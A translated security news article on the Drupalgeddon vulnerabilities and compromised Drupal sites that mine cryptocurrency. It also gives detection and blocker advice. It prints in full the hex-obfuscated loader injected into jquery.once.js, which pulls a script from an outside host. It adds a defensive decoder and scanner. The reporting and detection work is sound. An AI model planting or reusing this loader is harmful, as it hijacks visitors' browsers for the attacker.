Drupalgeddon effects: non-updated websites are mining cryptocurrency
Drupalgeddon1, Drupalgeddon2 and Drupalgeddon3
The name Drupalgeddon (Drupal plus Armageddon) reflects the seriousness of the threat: trivial code execution on the server or a full takeover of the website. These are high-risk incidents because the same attack can be carried out against a very large number of Drupal instances.
The first Drupalgeddon (CVE-2014-3704) appeared in 2014 and, according to the risk calculator used by the Drupal Security Team, received the maximum score of 25/25 on the threat-severity scale. The problem was that an anonymous user (without any special privileges) could send a crafted request that caused arbitrary SQL to be executed. Depending on the statement, this could lead, for example, to privilege escalation or execution of PHP code.
We waited four years for the second Drupalgeddon, until 28 March 2018. The out-of-band update fixed CVE-2018-7600, which allowed an attacker to run arbitrary code on the server without any special permissions; in a default installation the attacker did not even need to authenticate. Drupal's security team rated the vulnerability highly critical, 24/25. It is worth adding that sites served through CloudFlare were protected.
The third Drupalgeddon came on 25 April 2018. CVE-2018-7602 was considerably harder to exploit because it required authentication. That did not stop attackers, who used the published proof-of-concept exploit (also available in the Exploit Database) to carry out attacks, as they are called, in the wild.
The Exploit Database page contains ready-made command sequences for remote code execution on non-updated Drupal sites. The attack is very easy to carry out; details are available on GitHub.
There is nothing to wait for: updating is absolutely necessary.
Drupalgeddon's victims in Poland and worldwide
Troy Mursch published the statistics he has collected so far. Among the 384 compromised sites, most are in the US, France and Canada. The list includes two .pl domains belonging to Polish companies (szybka.pl and vaks.pl); we have contacted and warned their owners. Although the file lists only two Polish companies, this does not mean the researcher has reached every Drupal-powered site in the world. The scale is hard to estimate, but there are certainly more infected Polish sites.
The injected code can be recognised by the file "/misc/jquery.once.js?v=1.2", which at its very end contains an obfuscated reference to the script hxxp://vuuwd.com/t.js. The appended loader is not encrypted, only obfuscated: every string literal is written as \xHH hex escapes. Here it is as found, with one statement per line:
var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64');
var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');
D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';
D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';
D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';
RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);
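The loader above is only hex-escaped, so decoding it is a one-line substitution. The following is an added example written for this article (it is neither the article's own code nor anything from the malware): it decodes the loader exactly as quoted above, pulls out the indicators an analyst wants to block (the external script URL and the element id), and runs a small heuristic scan over a constructed stand-in for a tampered /misc/jquery.once.js. The two sample files (TAMPERED_JQUERY_ONCE and CLEAN_JQUERY_ONCE) are constructed placeholders, not real jquery.once library code, and the function names are this example's own.

```javascript
// Added example (not the article's code): decode the hex-escaped loader
// quoted in the article and extract its indicators of compromise.
// Runs offline in Node.js; the loader string is copied from the article and
// kept in String.raw so the \x escapes survive until we decode them ourselves.
const INJECTED_LOADER = String.raw`var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64');var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);`;

// Constructed stand-in for a tampered /misc/jquery.once.js: a placeholder
// for the legitimate library body with the loader appended at the end, which
// is where the article says the injection sits. Not real jquery.once code.
const TAMPERED_JQUERY_ONCE =
  '(function ($) { $.fn.once = function (id) { return this; }; })(jQuery);\n' +
  INJECTED_LOADER;

// Constructed clean file for comparison (also not real jquery.once code).
const CLEAN_JQUERY_ONCE =
  '(function ($) { $.fn.once = function (id) { return this; }; })(jQuery);\n';

// Turn every \xHH escape back into the character it encodes. This is the
// whole "decryption": the loader is escaped, not encrypted.
function decodeHexEscapes(source) {
  return source.replace(/\\x([0-9a-fA-F]{2})/g,
    (_m, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// From decoded JavaScript, collect the URLs assigned to a "src" property and
// the element ids assigned to an "id" property (either quote style). These
// are the two fields an analyst blocks on and hunts for in other sites.
function extractIndicators(decodedSource) {
  const srcRe = /\["src"\]\s*=\s*(['"])(.*?)\1/g;
  const idRe = /\["id"\]\s*=\s*(['"])(.*?)\1/g;
  return {
    urls: Array.from(decodedSource.matchAll(srcRe), (m) => m[2]),
    ids: Array.from(decodedSource.matchAll(idRe), (m) => m[2]),
  };
}

// Heuristic scan of a served script file. It is flagged when, after
// decoding, it creates a <script> element and points it at an external
// http(s) URL. The count of \xHH escapes is reported as supporting evidence:
// shipped library code does not normally spell "document" that way.
function scanServedScript(fileContents) {
  const escapeCount = (fileContents.match(/\\x[0-9a-fA-F]{2}/g) || []).length;
  const decoded = decodeHexEscapes(fileContents);
  const injectsScript =
    /\["createElement"\]\(\s*'script'\s*\)/.test(decoded) ||
    /createElement\(\s*["']script["']\s*\)/.test(decoded);
  const { urls, ids } = extractIndicators(decoded);
  const externalUrls = urls.filter((u) => /^https?:\/\//i.test(u));
  return {
    escapeCount,
    injectsScript,
    externalUrls,
    ids,
    suspicious: injectsScript && externalUrls.length > 0,
  };
}

console.log(decodeHexEscapes(INJECTED_LOADER));
console.log(scanServedScript(TAMPERED_JQUERY_ONCE));
console.log(scanServedScript(CLEAN_JQUERY_ONCE));
```

Decoding yields the plain DOM injection: the loader looks up the <head> element, creates a <script> with id "m_g_a" and src "http://vuuwd.com/t.js", and appends it. To check a live site, save the body of /misc/jquery.once.js?v=1.2 and pass it to scanServedScript; the escape count alone is a useful triage signal even if the attacker changes the domain.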
Content of hxxp://vuuwd.com/t.js:
The victims include American and Turkish government websites, universities, the Lenovo website, two sites under the .pl TLD and many more.
Non-updated websites are dangerous for Internet users
It is not possible to manually verify the security of every website you visit. We recommend that readers install the uBlock Origin ad blocker, which ships with built-in blocklists of cryptocurrency miners. That should be enough to block scripts that hijack CPU time. For those who do not want to use uBlock Origin, we recommend the NoCoin extension for Firefox, Opera and Chrome.
Users who already have an antivirus installed, but not necessarily one with browser protection, should install the Bitdefender TrafficLight or Avira Browser Safety web scanner.
We use the Google Cloud Translation and Gengo APIs to translate articles, with the exception of our comparative tests.